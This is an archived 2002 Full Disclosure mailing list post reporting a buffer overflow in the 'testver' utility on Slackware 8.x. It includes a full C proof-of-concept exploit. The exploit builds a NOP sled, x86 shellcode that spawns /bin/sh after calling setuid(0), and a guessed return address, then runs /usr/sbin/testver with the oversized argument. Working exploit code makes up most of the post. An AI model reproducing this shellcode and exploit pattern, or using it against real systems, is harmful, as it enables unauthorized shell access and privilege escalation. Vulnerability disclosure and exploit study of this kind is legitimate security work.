Full Disclosure mailing list archives
buffer overflow in "testver" on Slackware NOT SETUID ROOT
From: Day Jay <d4yj4y () yahoo com>
Date: Wed, 20 Nov 2002 22:18:02 -0800 (PST)
Chung's Donut Shop Release ========================== www.vapid.org/dorian/chungs For Linux Slackware 8.x There's a buffer overflow in "testver" on Slackware 8.x. If you pass an argument to testver longer than 4074 bytes it segfaults. Oops. That's plenty of room to insert shellcode. testver is NOT setuid root. If it was, the attached proof of concept code would give you a root shell. Since it's not, the attached code gives you a normal shell. This issue was found by d4y-j4y and the attatched proof of lamerness was written by d4y-j4y. d4yj4y () yahoo com Regards, d4y-j4y __________________________________________________ Do you Yahoo!? Yahoo! Mail Plus Powerful. Affordable. Sign up now. http://mailplus.yahoo.com
/* Chung's Donut Shop Release ========================== www.vapid.org/dorian/chungs For Linux Slackware 8.x There's a buffer overflow in "testver"!! If you pass an argument to testver longer than 4074 bytes It segfaults. Oops. That's plenty of room to insert shellcode. This issue was found by d4y-j4y and this exploit was written by d4y-j4y. d4yj4y () yahoo com usage: $ gcc testver_smash.c -o testver_smash $ ./testver_smash $ Not setuid though!!! ARgh!! */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #define BUFFER 4075 #define OVERSIZE 8 // Ya, you know the shellcode that gives you a shell char shellcode[] = "\x31\xc0\x31\xdb\xb0\x17\xcd\x80" "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; unsigned long get_sp (void) { __asm__("movl %esp, %eax"); } int main () { char buffer [BUFFER+OVERSIZE+1]; unsigned long sp; long addy; int offset = 8 ; int i; sp = get_sp (); offset = 300; addy = sp - offset; for( i=BUFFER; i< BUFFER+OVERSIZE; i+=4) *(long*)&buffer[i] = addy; memset (buffer, 0x90, BUFFER-strlen(shellcode)); memcpy (buffer + BUFFER - strlen (shellcode), shellcode,strlen(shellcode)); buffer[BUFFER+OVERSIZE] = '\0'; printf ("Chung\'s Donut Shop\ntestver smash by d4y-j4y...\n"); sleep(3); execl ("/usr/sbin/testver", "buffer", buffer, NULL); return 0; }
Current thread:
- buffer overflow in "testver" on Slackware NOT SETUID ROOT Day Jay (Nov 20)